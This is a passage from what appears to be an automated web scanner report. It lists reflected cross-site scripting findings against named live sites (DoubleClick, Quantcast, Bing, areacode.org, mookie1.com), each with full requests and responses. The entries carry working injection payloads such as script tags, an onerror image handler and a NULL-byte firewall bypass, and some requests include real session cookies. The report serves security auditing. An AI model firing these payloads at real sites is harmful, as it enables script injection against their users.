ttp://ad.doubleclick.net/activity;src=2127271;stragg=1;v=1;pid=18824836;aid=236883395;ko=0;cid=40818774;rid=40836561;rv=1;rn=2307084;";
this.swfParams = 'src=2127271&rv=1&rid=40836561&=27956'-alert(1)-'a0fcdcacbd9&';
this.renderingId = "40836561";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/KOMO/HOME [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/KOMO/HOME

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00322a1'-alert(1)-'c7b800a0218 was submitted in the sz parameter. This input was echoed as 322a1'-alert(1)-'c7b800a0218 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/KOMO/HOME;sz=%00322a1'-alert(1)-'c7b800a0218 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 50373
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Feb 2011 21:47:29 GMT
Expires: Wed, 23 Feb 2011 21:47:29 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
://ad.doubleclick.net/activity;src=2127271;stragg=1;v=1;pid=18824836;aid=236883395;ko=0;cid=40818774;rid=40836561;rv=1;rn=2864662;";
this.swfParams = 'src=2127271&rv=1&rid=40836561&=%00322a1'-alert(1)-'c7b800a0218&';
this.renderingId = "40836561";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

1.42. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48256"><a>b8cff9c400d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css48256"><a>b8cff9c400d/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 23:11:46 GMT
Content-Length: 7728
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css48256"><a>b8cff9c400d ie6.css" />
...[SNIP]...

1.43. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8485d"><a>4fb1c3ae11e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie6.css8485d"><a>4fb1c3ae11e HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 23:12:20 GMT
Content-Length: 7728
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie6.css8485d"><a>4fb1c3ae11e" />
...[SNIP]...

1.44. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62631"><a>0818aa67453 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css62631"><a>0818aa67453/ie7.css?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 23:11:47 GMT
Content-Length: 7728
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css62631"><a>0818aa67453 ie7.css" />
...[SNIP]...

1.45. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd709"><a>6e1ecdc6d7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie7.cssfd709"><a>6e1ecdc6d7c?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 23:12:23 GMT
Content-Length: 7728
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie7.cssfd709"><a>6e1ecdc6d7c" />
...[SNIP]...

1.46. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96fc2"><a>418e99f22e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css96fc2"><a>418e99f22e1/screen-optimized.css?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1297862294.1298206755.2

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:09 GMT
Connection: close
Content-Length: 7788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css96fc2"><a>418e99f22e1 screen-optimized.css" />
...[SNIP]...

1.47. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40a8"><a>dca22fd21f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.csse40a8"><a>dca22fd21f3?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1297862294.1298206755.2

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:45 GMT
Connection: close
Content-Length: 7791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css screen-optimized.csse40a8"><a>dca22fd21f3" />
...[SNIP]...

1.48. http://ak.quantcast.com/images/sprite.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /images/sprite.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9904"><a>6e51fd54aca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesa9904"><a>6e51fd54aca/sprite.png?v=20110222 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:10 GMT
Connection: close
Content-Length: 7746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" imagesa9904"><a>6e51fd54aca sprite.png" />
...[SNIP]...

1.49. http://ak.quantcast.com/images/sprite.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /images/sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0e4"><a>81bf2eedf52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/sprite.pngcc0e4"><a>81bf2eedf52?v=20110222 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:47 GMT
Connection: close
Content-Length: 7746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" images sprite.pngcc0e4"><a>81bf2eedf52" />
...[SNIP]...

1.50. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2add5"><a>fbd859f2a29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js2add5"><a>fbd859f2a29/concat.js?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1297862294.1298206755.2

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:09 GMT
Connection: close
Content-Length: 7728


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js2add5"><a>fbd859f2a29 concat.js" />
...[SNIP]...

1.51. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3131a"><a>e5ef3186019 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/concat.js3131a"><a>e5ef3186019?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1297862294.1298206755.2

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:46 GMT
Connection: close
Content-Length: 7728


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js concat.js3131a"><a>e5ef3186019" />
...[SNIP]...

1.52. http://api.bing.com/qsonhs.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload acb7b<img%20src%3da%20onerror%3dalert(1)>a736eb9518c was submitted in the q parameter. This input was echoed as acb7b<img src=a onerror=alert(1)>a736eb9518c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIH&q=acb7b<img%20src%3da%20onerror%3dalert(1)>a736eb9518c HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 6a828c6d806f46b4821695af4181d82d
Date: Sat, 26 Feb 2011 00:17:05 GMT
Connection: close

{"AS":{"Query":"acb7b<img src=a onerror=alert(1)>a736eb9518c","FullResults":1}}

1.53. http://areacode.org/803 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://areacode.org
Path:   /803

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc32c'><script>alert(1)</script>e07cbbd8d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /803?cc32c'><script>alert(1)</script>e07cbbd8d60=1 HTTP/1.1
Host: areacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Feb 2011 01:58:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11022745;expires=Mon, 18-Feb-2041 01:58:39 GMT;path=/
Set-Cookie: CFTOKEN=61649987;expires=Mon, 18-Feb-2041 01:58:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   
...[SNIP]...
<input id="page_link" name="page_link" type="text" class="text_field" value='http://areacode.org/803?cc32c'><script>alert(1)</script>e07cbbd8d60=1'>
...[SNIP]...

1.54. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9584"><script>alert(1)</script>e2a5ada99b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderc9584"><script>alert(1)</script>e2a5ada99b2/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderc9584"><script>alert(1)</script>e2a5ada99b2/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/2013242908/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.55. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c39"><script>alert(1)</script>30bb4a78677 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATTd4c39"><script>alert(1)</script>30bb4a78677/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATTd4c39"><script>alert(1)</script>30bb4a78677/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1962202983/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.56. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613f7"><script>alert(1)</script>691cdb4b46f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

